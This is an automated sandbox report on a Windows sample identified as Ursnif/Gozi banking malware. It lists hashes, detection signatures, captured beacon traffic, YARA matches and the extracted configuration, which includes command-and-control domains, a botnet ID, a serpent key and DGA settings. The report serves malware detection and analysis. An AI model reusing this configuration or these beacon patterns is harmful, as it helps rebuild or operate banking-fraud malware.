Play interactive tour

Edit tour

Windows Analysis Report Rats4dIOmA.exe

Overview

General Information

Sample Name:	Rats4dIOmA.exe
Analysis ID:	528071
MD5:	76a29095e02a151adc1f42ec844a65bd
SHA1:	afd4593a0e709a11296556d5b1fb1833bb394c4d
SHA256:	c26838865c476704101363c16c535dfae494dedadae972c0377c4f67669578b5
Tags:	exeGozi
Infos:
Most interesting Screenshot:

Detection

Ursnif

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Detected unpacking (overwrites its own PE header)

Yara detected Ursnif

Detected unpacking (changes PE section rights)

Writes or reads registry keys via WMI

Machine Learning detection for sample

Writes registry values via WMI

Uses 32bit PE files

Antivirus or Machine Learning detection for unpacked file

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

IP address seen in connection with other malware

PE file contains strange resources

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Classification

Process Tree

System is w10x64

Rats4dIOmA.exe (PID: 6456 cmdline: "C:\Users\user\Desktop\Rats4dIOmA.exe" MD5: 76A29095E02A151ADC1F42EC844A65BD)

cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "dm+RfNkITE5FceWriGPYkZaFfoP/k2XQ2jeLd8rNgFw6gJ6fNWsHd0U6akxsQHth/SBWm4/eMI9Y1qgwNJteasgQsUC7Ht20y96mIxH1hvPh9uvLSH5z2CNo+fcP8K+V0yoOOQzDln/qE7mMJHLu+rmogHE7S6lb7FVy/7xxrRe3zMDt5K9bDwOreWw0blGE", "c2_domain": ["yahoo.com", "soderunovos.website", "qoderunovos.website", "https://soderunovos.website", "https://qoderunovos.website"], "botnet": "4482", "server": "12", "serpent_key": "10291029JSJUYNHG", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "dga_base_url": "constitution.org/usdeclar.txt", "dga_tld": "com ru org", "DGA_count": "10"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000000.00000003.310816150.0000000004758000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.310772228.0000000004758000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.310824742.0000000004758000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000002.518140305.00000000042B9000.00000004.00000040.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000000.00000002.518183803.0000000004758000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.310739841.0000000004758000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.310804717.0000000004758000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.310680440.0000000004758000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.310789542.0000000004758000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.310712356.0000000004758000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: Rats4dIOmA.exe PID: 6456	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Click to see the 6 entries

Unpacked PEs

Source	Rule	Description	Author
0.2.Rats4dIOmA.exe.42b94a0.3.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0.2.Rats4dIOmA.exe.3c40000.2.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0.2.Rats4dIOmA.exe.42b94a0.3.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000000.00000002.517164137.0000000001FE0000.00000040.00000001.sdmp

Malware Configuration Extractor: Ursnif {"RSA Public Key": "dm+RfNkITE5FceWriGPYkZaFfoP/k2XQ2jeLd8rNgFw6gJ6fNWsHd0U6akxsQHth/SBWm4/eMI9Y1qgwNJteasgQsUC7Ht20y96mIxH1hvPh9uvLSH5z2CNo+fcP8K+V0yoOOQzDln/qE7mMJHLu+rmogHE7S6lb7FVy/7xxrRe3zMDt5K9bDwOreWw0blGE", "c2_domain": ["yahoo.com", "soderunovos.website", "qoderunovos.website", "https://soderunovos.website", "https://qoderunovos.website"], "botnet": "4482", "server": "12", "serpent_key": "10291029JSJUYNHG", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "dga_base_url": "constitution.org/usdeclar.txt", "dga_tld": "com ru org", "DGA_count": "10"}

Multi AV Scanner detection for submitted file

Show sources

Source: Rats4dIOmA.exe	Metadefender: Detection: 22%			Perma Link
Source: Rats4dIOmA.exe	ReversingLabs: Detection: 45%

Machine Learning detection for sample

Show sources

Source: Rats4dIOmA.exe

Joe Sandbox ML: detected

Source: 0.2.Rats4dIOmA.exe.1fe0e50.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 0.2.Rats4dIOmA.exe.400000.0.unpack	Avira: Label: TR/Crypt.XPACK.Gen7
Source: 0.3.Rats4dIOmA.exe.3bf0000.0.unpack	Avira: Label: TR/Patched.Ren.Gen

Compliance:

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\Desktop\Rats4dIOmA.exe

Unpacked PE file: 0.2.Rats4dIOmA.exe.400000.0.unpack

Source: Rats4dIOmA.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: C:\Users\user\Desktop\Rats4dIOmA.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 74.6.143.26:443 -> 192.168.2.5:49762 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 87.248.100.216:443 -> 192.168.2.5:49763 version: TLS 1.2

Source:	Binary string: C:\sax\w.pdb source: Rats4dIOmA.exe
Source:	Binary string: C:\sax\w.pdbP+C source: Rats4dIOmA.exe

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Joe Sandbox View	IP Address: 74.6.143.26 74.6.143.26
Source: Joe Sandbox View	IP Address: 87.248.100.216 87.248.100.216

Source: global traffic	HTTP traffic detected: GET /jdraw/hz1bq3PmtqtDPcpAxd/_2FGYs9V_/2BcaIfj8lzbe6dwp1S50/qnf1CtPsO2EGsTOGBt0/TpQo4OHaLh1DZAzOHIElg2/LmJhngmT2kJ_2/FHuNwneH/Olki6SGkOhEdHnRV6_2B266/I71jLcWlaJ/WAM1n0wLbM0TzOock/J5o_2ByTSV9y/SAhEyWB5DMB/4lW4ok5N/nAsrN2WO_/2Fjc4.crw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: yahoo.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /jdraw/hz1bq3PmtqtDPcpAxd/_2FGYs9V_/2BcaIfj8lzbe6dwp1S50/qnf1CtPsO2EGsTOGBt0/TpQo4OHaLh1DZAzOHIElg2/LmJhngmT2kJ_2/FHuNwneH/Olki6SGkOhEdHnRV6_2B266/I71jLcWlaJ/WAM1n0wLbM0TzOock/J5o_2ByTSV9y/SAhEyWB5DMB/4lW4ok5N/nAsrN2WO_/2Fjc4.crw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Connection: Keep-AliveCache-Control: no-cacheHost: www.yahoo.comCookie: B=b5jn619gpst97&b=3&s=c6

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not Founddate: Wed, 24 Nov 2021 17:23:51 GMTp3p: policyref="https://policies.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"cache-control: privatex-content-type-options: nosniffcontent-type: text/html; charset=UTF-8x-envoy-upstream-service-time: 9server: ATSAge: 0Transfer-Encoding: chunkedConnection: closeStrict-Transport-Security: max-age=31536000Content-Security-Policy: frame-ancestors 'self' https://*.builtbygirls.com https://*.rivals.com https://*.engadget.com https://*.intheknow.com https://*.autoblog.com https://*.techcrunch.com https://*.yahoo.com https://*.aol.com https://*.huffingtonpost.com https://*.oath.com https://*.search.yahoo.com https://*.search.aol.com https://*.search.huffpost.com https://*.verizonmedia.com https://*.publishing.oath.com https://*.autoblog.com; sandbox allow-forms allow-same-origin allow-scripts allow-popups allow-popups-to-escape-sandbox allow-presentation; report-uri https://csp.yahoo.com/beacon/csp?src=ats&site=frontpage&region=US&lang=en-US&device=desktop&yrid=cc01o4tgpst97&partner=;X-Frame-Options: SAMEORIGINX-XSS-Protection: 1; mode=block

Source: Rats4dIOmA.exe, 00000000.00000003.310617078.00000000021A9000.00000004.00000001.sdmp, Rats4dIOmA.exe, 00000000.00000003.309800668.00000000021A9000.00000004.00000001.sdmp, Rats4dIOmA.exe, 00000000.00000003.309794637.00000000021A6000.00000004.00000001.sdmp, Rats4dIOmA.exe, 00000000.00000003.310611526.00000000021F3000.00000004.00000001.sdmp, Rats4dIOmA.exe, 00000000.00000002.517602445.00000000021A4000.00000004.00000001.sdmp	String found in binary or memory: *.www.yahoo.com equals www.yahoo.com (Yahoo)
Source: Rats4dIOmA.exe, 00000000.00000003.310617078.00000000021A9000.00000004.00000001.sdmp, Rats4dIOmA.exe, 00000000.00000003.309800668.00000000021A9000.00000004.00000001.sdmp, Rats4dIOmA.exe, 00000000.00000003.309794637.00000000021A6000.00000004.00000001.sdmp, Rats4dIOmA.exe, 00000000.00000002.517602445.00000000021A4000.00000004.00000001.sdmp	String found in binary or memory: *.www.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: Rats4dIOmA.exe, 00000000.00000003.310617078.00000000021A9000.00000004.00000001.sdmp	String found in binary or memory: +www.yahoo.com=- equals www.yahoo.com (Yahoo)
Source: Rats4dIOmA.exe, 00000000.00000003.310617078.00000000021A9000.00000004.00000001.sdmp, Rats4dIOmA.exe, 00000000.00000002.517602445.00000000021A4000.00000004.00000001.sdmp	String found in binary or memory: +www.yahoo.comS- equals www.yahoo.com (Yahoo)
Source: Rats4dIOmA.exe, 00000000.00000002.517602445.00000000021A4000.00000004.00000001.sdmp	String found in binary or memory: <noscript><META http-equiv="refresh" content="0;URL='https://www.yahoo.com/?err=404&err_url=https%3a%2f%2fwww.yahoo.com%2fjdraw%2fhz1bq3PmtqtDPcpAxd%2f_2FGYs9V_%2f2BcaIfj8lzbe6dwp1S50%2fqnf1CtPsO2EGsTOGBt0%2fTpQo4OHaLh1DZAzOHIElg2%2fLmJhngmT2kJ_2%2fFHuNwneH%2fOlki6SGkOhEdHnRV6_2B266%2fI71jLcWlaJ%2fWAM1n0wLbM0TzOock%2fJ5o_2ByTSV9y%2fSAhEyWB5DMB%2f4lW4ok5N%2fnAsrN2WO_%2f2Fjc4.crw'"></noscript> equals www.yahoo.com (Yahoo)
Source: Rats4dIOmA.exe, 00000000.00000003.310617078.00000000021A9000.00000004.00000001.sdmp, Rats4dIOmA.exe, 00000000.00000002.517602445.00000000021A4000.00000004.00000001.sdmp	String found in binary or memory: Host: www.yahoo.com equals www.yahoo.com (Yahoo)
Source: Rats4dIOmA.exe, 00000000.00000003.309800668.00000000021A9000.00000004.00000001.sdmp	String found in binary or memory: Location: https://www.yahoo.com/jdraw/hz1bq3PmtqtDPcpAxd/_2FGYs9V_/2BcaIfj8lzbe6dwp1S50/qnf1CtPsO2EGsTOGBt0/TpQo4OHaLh1DZAzOHIElg2/LmJhngmT2kJ_2/FHuNwneH/Olki6SGkOhEdHnRV6_2B266/I71jLcWlaJ/WAM1n0wLbM0TzOock/J5o_2ByTSV9y/SAhEyWB5DMB/4lW4ok5N/nAsrN2WO_/2Fjc4.crw equals www.yahoo.com (Yahoo)
Source: Rats4dIOmA.exe, 00000000.00000003.310617078.00000000021A9000.00000004.00000001.sdmp, Rats4dIOmA.exe, 00000000.00000002.517602445.00000000021A4000.00000004.00000001.sdmp	String found in binary or memory: https://www.yahoo.com/ equals www.yahoo.com (Yahoo)
Source: Rats4dIOmA.exe, 00000000.00000003.310617078.00000000021A9000.00000004.00000001.sdmp, Rats4dIOmA.exe, 00000000.00000003.310611526.00000000021F3000.00000004.00000001.sdmp, Rats4dIOmA.exe, 00000000.00000002.517602445.00000000021A4000.00000004.00000001.sdmp	String found in binary or memory: https://www.yahoo.com/jdraw/hz1bq3PmtqtDPcpAxd/_2FGYs9V_/2BcaIfj8lzbe6dwp1S50/qnf1CtPsO2EGsTOGBt0/TpQo4OHaLh1DZAzOHIElg2/LmJhngmT2kJ_2/FHuNwneH/Olki6SGkOhEdHnRV6_2B266/I71jLcWlaJ/WAM1n0wLbM0TzOock/J5o_2ByTSV9y/SAhEyWB5DMB/4lW4ok5N/nAsrN2WO_/2Fjc4.crw equals www.yahoo.com (Yahoo)
Source: Rats4dIOmA.exe, 00000000.00000003.310617078.00000000021A9000.00000004.00000001.sdmp, Rats4dIOmA.exe, 00000000.00000002.517602445.00000000021A4000.00000004.00000001.sdmp	String found in binary or memory: https://www.yahoo.com/k=# equals www.yahoo.com (Yahoo)
Source: Rats4dIOmA.exe, 00000000.00000002.517602445.00000000021A4000.00000004.00000001.sdmp	String found in binary or memory: var u='https://www.yahoo.com/?err=404&err_url=https%3a%2f%2fwww.yahoo.com%2fjdraw%2fhz1bq3PmtqtDPcpAxd%2f_2FGYs9V_%2f2BcaIfj8lzbe6dwp1S50%2fqnf1CtPsO2EGsTOGBt0%2fTpQo4OHaLh1DZAzOHIElg2%2fLmJhngmT2kJ_2%2fFHuNwneH%2fOlki6SGkOhEdHnRV6_2B266%2fI71jLcWlaJ%2fWAM1n0wLbM0TzOock%2fJ5o_2ByTSV9y%2fSAhEyWB5DMB%2f4lW4ok5N%2fnAsrN2WO_%2f2Fjc4.crw'; equals www.yahoo.com (Yahoo)
Source: Rats4dIOmA.exe, 00000000.00000003.310617078.00000000021A9000.00000004.00000001.sdmp, Rats4dIOmA.exe, 00000000.00000002.518270171.000000000502A000.00000004.00000010.sdmp, Rats4dIOmA.exe, 00000000.00000002.517602445.00000000021A4000.00000004.00000001.sdmp	String found in binary or memory: www.yahoo.com equals www.yahoo.com (Yahoo)
Source: Rats4dIOmA.exe, 00000000.00000003.310617078.00000000021A9000.00000004.00000001.sdmp	String found in binary or memory: www.yahoo.com' equals www.yahoo.com (Yahoo)
Source: Rats4dIOmA.exe, 00000000.00000003.310617078.00000000021A9000.00000004.00000001.sdmp, Rats4dIOmA.exe, 00000000.00000002.517602445.00000000021A4000.00000004.00000001.sdmp	String found in binary or memory: www.yahoo.com/jdraw/hz1bq3PmtqtDPcpAxd/_2FGYs9V_/2BcaIfj8lzbe6dwp1S50/qnf1CtPsO2EGsTOGBt0/TpQo4OHaLh1DZAzOHIElg2/LmJhngmT2kJ_2/FHuNwneH/Olki6SGkOhEdHnRV6_2B266/I71jLcWlaJ/WAM1n0wLbM0TzOock/J5o_2ByTSV9y/SAhEyWB5DMB/4lW4ok5N/nAsrN2WO_/2Fjc4.crw equals www.yahoo.com (Yahoo)
Source: Rats4dIOmA.exe, 00000000.00000003.310617078.00000000021A9000.00000004.00000001.sdmp	String found in binary or memory: www.yahoo.com7 equals www.yahoo.com (Yahoo)
Source: Rats4dIOmA.exe, 00000000.00000003.310617078.00000000021A9000.00000004.00000001.sdmp, Rats4dIOmA.exe, 00000000.00000002.517602445.00000000021A4000.00000004.00000001.sdmp	String found in binary or memory: www.yahoo.comVB equals www.yahoo.com (Yahoo)
Source: Rats4dIOmA.exe, 00000000.00000003.310617078.00000000021A9000.00000004.00000001.sdmp	String found in binary or memory: www.yahoo.combA equals www.yahoo.com (Yahoo)

Source: Rats4dIOmA.exe, 00000000.00000003.310617078.00000000021A9000.00000004.00000001.sdmp, Rats4dIOmA.exe, 00000000.00000003.309800668.00000000021A9000.00000004.00000001.sdmp, Rats4dIOmA.exe, 00000000.00000002.517602445.00000000021A4000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: Rats4dIOmA.exe, 00000000.00000003.310617078.00000000021A9000.00000004.00000001.sdmp, Rats4dIOmA.exe, 00000000.00000003.310772228.0000000004758000.00000004.00000040.sdmp, Rats4dIOmA.exe, 00000000.00000003.310833541.000000000475B000.00000004.00000040.sdmp, Rats4dIOmA.exe, 00000000.00000002.517602445.00000000021A4000.00000004.00000001.sdmp	String found in binary or memory: https://csp.yahoo.com/beacon/csp?src=ats&site=frontpage&region=US&lang=en-US&device=desktop&yrid=cc0
Source: Rats4dIOmA.exe, 00000000.00000003.310617078.00000000021A9000.00000004.00000001.sdmp, Rats4dIOmA.exe, 00000000.00000003.310772228.0000000004758000.00000004.00000040.sdmp, Rats4dIOmA.exe, 00000000.00000003.310833541.000000000475B000.00000004.00000040.sdmp, Rats4dIOmA.exe, 00000000.00000002.517602445.00000000021A4000.00000004.00000001.sdmp	String found in binary or memory: https://policies.yahoo.com/w3c/p3p.xml
Source: Rats4dIOmA.exe, 00000000.00000003.310772228.0000000004758000.00000004.00000040.sdmp, Rats4dIOmA.exe, 00000000.00000002.518183803.0000000004758000.00000004.00000040.sdmp	String found in binary or memory: https://qoderunovos.website
Source: Rats4dIOmA.exe, 00000000.00000003.310772228.0000000004758000.00000004.00000040.sdmp, Rats4dIOmA.exe, 00000000.00000002.518183803.0000000004758000.00000004.00000040.sdmp	String found in binary or memory: https://soderunovos.website
Source: Rats4dIOmA.exe, 00000000.00000002.517602445.00000000021A4000.00000004.00000001.sdmp	String found in binary or memory: https://soderunovos.website/jdraw/ldez60nkcypupl/Y8k6P2TKljJ3iNZCDUKjs/bDzAl0Dd4aRnqW1G/ctGW3CyINNEj
Source: Rats4dIOmA.exe, 00000000.00000003.310772228.0000000004758000.00000004.00000040.sdmp, Rats4dIOmA.exe, 00000000.00000002.518183803.0000000004758000.00000004.00000040.sdmp	String found in binary or memory: https://soderunovos.websitehttps://qoderunovos.websiten
Source: Rats4dIOmA.exe, 00000000.00000003.310617078.00000000021A9000.00000004.00000001.sdmp, Rats4dIOmA.exe, 00000000.00000002.517602445.00000000021A4000.00000004.00000001.sdmp	String found in binary or memory: https://www.yahoo.com/
Source: Rats4dIOmA.exe, 00000000.00000002.517602445.00000000021A4000.00000004.00000001.sdmp	String found in binary or memory: https://www.yahoo.com/?err=404&err_url=https%3a%2f%2fwww.yahoo.com%2fjdraw%2fhz1bq3PmtqtDPcpAxd%2f_2
Source: Rats4dIOmA.exe, 00000000.00000003.310617078.00000000021A9000.00000004.00000001.sdmp, Rats4dIOmA.exe, 00000000.00000003.309800668.00000000021A9000.00000004.00000001.sdmp, Rats4dIOmA.exe, 00000000.00000003.310611526.00000000021F3000.00000004.00000001.sdmp, Rats4dIOmA.exe, 00000000.00000002.517602445.00000000021A4000.00000004.00000001.sdmp	String found in binary or memory: https://www.yahoo.com/jdraw/hz1bq3PmtqtDPcpAxd/_2FGYs9V_/2BcaIfj8lzbe6dwp1S50/qnf1CtPsO2EGsTOGBt0/Tp
Source: Rats4dIOmA.exe, 00000000.00000003.310617078.00000000021A9000.00000004.00000001.sdmp, Rats4dIOmA.exe, 00000000.00000002.517602445.00000000021A4000.00000004.00000001.sdmp	String found in binary or memory: https://www.yahoo.com/k=#

Source: unknown

DNS traffic detected: queries for: yahoo.com

Source: C:\Users\user\Desktop\Rats4dIOmA.exe

Code function: 0_2_03C45988 ResetEvent,ResetEvent,lstrcat,InternetReadFile,GetLastError,ResetEvent,InternetReadFile,GetLastError,

0_2_03C45988

Source: global traffic	HTTP traffic detected: GET /jdraw/hz1bq3PmtqtDPcpAxd/_2FGYs9V_/2BcaIfj8lzbe6dwp1S50/qnf1CtPsO2EGsTOGBt0/TpQo4OHaLh1DZAzOHIElg2/LmJhngmT2kJ_2/FHuNwneH/Olki6SGkOhEdHnRV6_2B266/I71jLcWlaJ/WAM1n0wLbM0TzOock/J5o_2ByTSV9y/SAhEyWB5DMB/4lW4ok5N/nAsrN2WO_/2Fjc4.crw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: yahoo.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /jdraw/hz1bq3PmtqtDPcpAxd/_2FGYs9V_/2BcaIfj8lzbe6dwp1S50/qnf1CtPsO2EGsTOGBt0/TpQo4OHaLh1DZAzOHIElg2/LmJhngmT2kJ_2/FHuNwneH/Olki6SGkOhEdHnRV6_2B266/I71jLcWlaJ/WAM1n0wLbM0TzOock/J5o_2ByTSV9y/SAhEyWB5DMB/4lW4ok5N/nAsrN2WO_/2Fjc4.crw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Connection: Keep-AliveCache-Control: no-cacheHost: www.yahoo.comCookie: B=b5jn619gpst97&b=3&s=c6

Source: unknown	HTTPS traffic detected: 74.6.143.26:443 -> 192.168.2.5:49762 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 87.248.100.216:443 -> 192.168.2.5:49763 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000000.00000003.310816150.0000000004758000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.310772228.0000000004758000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.310824742.0000000004758000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.518183803.0000000004758000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.310739841.0000000004758000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.310804717.0000000004758000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.310680440.0000000004758000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.310789542.0000000004758000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.310712356.0000000004758000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Rats4dIOmA.exe PID: 6456, type: MEMORYSTR
Source: Yara match	File source: 0.2.Rats4dIOmA.exe.42b94a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Rats4dIOmA.exe.3c40000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Rats4dIOmA.exe.42b94a0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.518140305.00000000042B9000.00000004.00000040.sdmp, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000000.00000003.310816150.0000000004758000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.310772228.0000000004758000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.310824742.0000000004758000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.518183803.0000000004758000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.310739841.0000000004758000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.310804717.0000000004758000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.310680440.0000000004758000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.310789542.0000000004758000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.310712356.0000000004758000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Rats4dIOmA.exe PID: 6456, type: MEMORYSTR
Source: Yara match	File source: 0.2.Rats4dIOmA.exe.42b94a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Rats4dIOmA.exe.3c40000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Rats4dIOmA.exe.42b94a0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.518140305.00000000042B9000.00000004.00000040.sdmp, type: MEMORY

System Summary:

Writes or reads registry keys via WMI

Show sources

Source: C:\Users\user\Desktop\Rats4dIOmA.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Users\user\Desktop\Rats4dIOmA.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\Desktop\Rats4dIOmA.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\Rats4dIOmA.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Writes registry values via WMI

Show sources

Source: C:\Users\user\Desktop\Rats4dIOmA.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\Desktop\Rats4dIOmA.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\Rats4dIOmA.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Source: Rats4dIOmA.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: C:\Users\user\Desktop\Rats4dIOmA.exe	Code function: 0_2_03C4AFC0	0_2_03C4AFC0
Source: C:\Users\user\Desktop\Rats4dIOmA.exe	Code function: 0_2_03C47FBE	0_2_03C47FBE
Source: C:\Users\user\Desktop\Rats4dIOmA.exe	Code function: 0_2_03C4836E	0_2_03C4836E

Source: C:\Users\user\Desktop\Rats4dIOmA.exe	Code function: 0_2_00401703 NtMapViewOfSection,	0_2_00401703
Source: C:\Users\user\Desktop\Rats4dIOmA.exe	Code function: 0_2_00401C90 GetProcAddress,NtCreateSection,memset,	0_2_00401C90
Source: C:\Users\user\Desktop\Rats4dIOmA.exe	Code function: 0_2_004019A0 NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,GetLastError,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,	0_2_004019A0
Source: C:\Users\user\Desktop\Rats4dIOmA.exe	Code function: 0_2_03C49A0F NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	0_2_03C49A0F
Source: C:\Users\user\Desktop\Rats4dIOmA.exe	Code function: 0_2_03C4B1E5 NtQueryVirtualMemory,	0_2_03C4B1E5
Source: C:\Users\user\Desktop\Rats4dIOmA.exe	Code function: 0_2_01FE1BF0 NtQuerySystemInformation,Sleep,CreateThread,QueueUserAPC,TerminateThread,SetLastError,WaitForSingleObject,GetExitCodeThread,	0_2_01FE1BF0

Source: Rats4dIOmA.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Rats4dIOmA.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: Rats4dIOmA.exe	Metadefender: Detection: 22%
Source: Rats4dIOmA.exe	ReversingLabs: Detection: 45%

Source: Rats4dIOmA.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Rats4dIOmA.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\Rats4dIOmA.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winEXE@1/0@4/2

Source: C:\Users\user\Desktop\Rats4dIOmA.exe

Code function: 0_2_03C48F1B CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

0_2_03C48F1B

Source: C:\Users\user\Desktop\Rats4dIOmA.exe	Command line argument: pemahu	0_2_0042F0A0
Source: C:\Users\user\Desktop\Rats4dIOmA.exe	Command line argument: Regefiri	0_2_0042F0A0
Source: C:\Users\user\Desktop\Rats4dIOmA.exe	Command line argument: Hucet	0_2_0042F0A0
Source: C:\Users\user\Desktop\Rats4dIOmA.exe	Command line argument: Xegixaze	0_2_0042F0A0
Source: C:\Users\user\Desktop\Rats4dIOmA.exe	Command line argument: \H	0_2_0042F0A0
Source: C:\Users\user\Desktop\Rats4dIOmA.exe	Command line argument: zijiwe	0_2_0042F0A0
Source: C:\Users\user\Desktop\Rats4dIOmA.exe	Command line argument: 2Y?	0_2_0042F0A0
Source: C:\Users\user\Desktop\Rats4dIOmA.exe	Command line argument: mecevituxe	0_2_0042F0A0
